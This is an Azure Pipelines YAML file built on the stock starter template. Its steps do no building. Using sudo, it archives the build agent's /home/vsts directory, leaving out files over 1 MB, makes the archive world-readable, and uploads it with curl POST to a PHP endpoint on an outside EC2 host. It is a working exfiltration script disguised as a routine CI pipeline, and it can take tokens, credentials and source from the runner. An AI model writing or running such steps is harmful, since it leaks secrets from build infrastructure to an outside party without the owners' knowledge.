# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool:
  vmImage: ubuntu-latest

steps:
- script: sudo /usr/bin/tar -czvf /mnt/teste1.tgz /home/vsts --exclude-from <(find /home/vsts/ -size +1M)
  displayName: 'Tar'
  continueOnError: true

- script: ls -lah /mnt/teste1.tgz
  displayName: 'ls'

- script: sudo chmod 777 /mnt/teste1.tgz
  displayName: 'chmod'

- script: curl -d "@/mnt/teste1.tgz" -X POST "http://ec2-15-229-9-199.sa-east-1.compute.amazonaws.com/energisa/hjkgdhgkfjd.php"
  displayName: 'upload'
